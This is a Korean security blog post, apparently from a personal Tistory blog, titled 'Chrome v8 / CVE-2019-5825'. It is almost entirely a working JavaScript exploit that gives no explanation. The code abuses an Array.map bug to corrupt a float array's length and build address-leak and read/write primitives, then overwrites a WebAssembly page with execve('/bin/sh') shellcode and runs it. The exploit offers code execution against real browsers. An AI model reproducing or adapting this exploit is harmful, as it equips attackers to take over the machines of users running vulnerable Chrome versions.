본문 바로가기
브라우저

Chrome v8 / CVE-2019-5825

jjy security 2020. 4. 23. 03:09

 

 

var buf = new ArrayBuffer(8); // 8 byte array buffer
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);

function ftoi(val) { // typeof(val) = float
    f64_buf[0] = val;
    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n); // Watch for little endianness
}
function itof(val) { // typeof(val) = BigInt
    u64_buf[0] = Number(BigInt(val) & 0xffffffffn);
    u64_buf[1] = Number(BigInt(val) >> 32n);
    return f64_buf[0];
}
function hex(val){
    return "0x"+val.toString(16)
}

Array(2 ** 30);


function assert(x){
	if(x){
		return;
	}
	else{
		throw "assert fail";
	}
}

function go(val,i){
    if(i>0x1a){
        throw "error"
    }
    if(i==0x1a){
        victim=[1.1,2.2,3.3,4.4,5.5]// crate and write --> have to write last idx 
    }
    return 0xdded;
}
function mapping(a){
    return a.map(go);
}
a=[1,,3];

var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;


for(i=0;i<0x10000;i++){
    mapping(a);
}
a.length=32 * 1024 * 1024-0x1;
a.fill(1);
a.push(2);
a.push(1);
try{
	b = mapping(a);
}catch{
    assert(victim.length==0x40ebbda0);
}



console.log("Bug triggerd!")
element=ftoi(victim[7])
console.log("element = "+hex(element))


addr=[0x1234,0x1357,{"a":"a"}]
for(addr_idx=0;;addr_idx++){
	if (ftoi(victim[addr_idx])==0x123400000000){
		if (ftoi(victim[addr_idx+1])==0x135700000000){
			console.log("addr idx found!!  "+addr_idx);
			break;
		}
	}

}


addr[2]=wasm_instance;
leak = ftoi(victim[addr_idx+2])+0x100n
console.log("RWX ptr = "+hex(leak))

var buf = new ArrayBuffer(0x100);
var dataview = new DataView(buf);


addr[2]=buf;
back = ftoi(victim[addr_idx+2])+0x20n
console.log("backingstore ptr = "+hex(back))

offset=((back-element)/8n)-2n
console.log("offset = "+hex(offset))

victim[offset]=itof(leak-1n);
test=0;
for(i=0;i<0x8;i++){
	tmp=dataview.getUint8(i)

	test+=tmp*(0x100**i)
}
victim[offset]=itof(test);

shellcode=[0x90909090,0x6a6848b8,0x2f62696e,0x2f2f2f73,0x504889e7,0x68726901,0x01813424,0x01010101,0x31f6566a,0x085e4801,0xe6564889,0xe631d26a,0x3b580f05]
function swap32(val) {
    return ((val & 0xFF) << 24)
           | ((val & 0xFF00) << 8)
           | ((val >> 8) & 0xFF00)
           | ((val >> 24) & 0xFF);
}

shellcode=shellcode.map(swap32)
for(i=0;i<shellcode.length;i++){
	dataview.setUint32(i*4,shellcode[i],true);
}
f();
저작자표시

'브라우저' 카테고리의 다른 글

DownUnderCTF 2020 / is-this-pwn-or-web  (0) 2020.09.21
Chrome v8 / CVE-2019-5791  (0) 2020.08.17
pwn2win 2020 / omnitmizer  (0) 2020.06.03
Chrome v8 / CVE-2020-6418  (1) 2020.04.25
2017 codegate / js_world  (0) 2020.02.29

'브라우저' Related Articles

티스토리툴바